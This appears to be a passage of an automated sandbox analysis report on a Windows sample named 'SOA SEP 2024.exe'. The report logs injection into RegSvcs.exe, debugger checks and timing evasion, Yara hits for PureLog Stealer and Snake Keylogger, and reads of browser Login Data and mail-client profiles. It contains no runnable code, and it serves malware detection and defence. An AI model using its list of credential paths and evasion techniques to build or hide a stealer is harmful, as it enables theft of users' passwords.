Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595113	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1515			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8302			Jump to behavior

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Evaded block: after key decision			graph_0-94424
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Evaded block: after key decision			graph_0-95455

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-94984

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

API coverage: 4.4 %

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007A6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_007A6CA9
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007A60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_007A60DD
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007A63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_007A63F9
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007AEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007AEB60
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007AF56F FindFirstFileW,FindClose,	0_2_007AF56F
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007AF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_007AF5FA
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007B1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007B1B2F
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007B1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007B1C8A
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007B1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007B1F94

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_0077DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0077DDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595113	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.4553026302.0000000001436000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007B6AAF BlockInput,

0_2_007B6AAF

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_00763D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00763D19

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_00793920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00793920

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

2_2_004019F0

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_0077E01E LoadLibraryA,GetProcAddress,

0_2_0077E01E

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00D694B0 mov eax, dword ptr fs:[00000030h]	0_2_00D694B0
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00D69450 mov eax, dword ptr fs:[00000030h]	0_2_00D69450
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00D67E30 mov eax, dword ptr fs:[00000030h]	0_2_00D67E30

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_0079A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0079A66C

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007881AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_007881AC
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00788189 SetUnhandledExceptionFilter,	0_2_00788189
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,	2_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F3E008

Jump to behavior

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_0079B106 LogonUserW,

0_2_0079B106

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_00763D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00763D19

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007A411C SendInput,keybd_event,

0_2_007A411C

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007A74E7 mouse_event,

0_2_007A74E7

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SOA SEP 2024.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

0_2_0079A66C

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007A71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_007A71FA

Source: SOA SEP 2024.exe	Binary or memory string: Shell_TrayWnd
Source: SOA SEP 2024.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007865C4 cpuid

0_2_007865C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

2_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007B091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_007B091D

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007DB340 GetUserNameW,

0_2_007DB340

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_00791E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00791E8E

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_0077DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0077DDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4553786112.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4553786112.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1560, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: SOA SEP 2024.exe	Binary or memory string: WIN_81
Source: SOA SEP 2024.exe	Binary or memory string: WIN_XP
Source: SOA SEP 2024.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: SOA SEP 2024.exe	Binary or memory string: WIN_XPe
Source: SOA SEP 2024.exe	Binary or memory string: WIN_VISTA
Source: SOA SEP 2024.exe	Binary or memory string: WIN_7
Source: SOA SEP 2024.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1560, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE
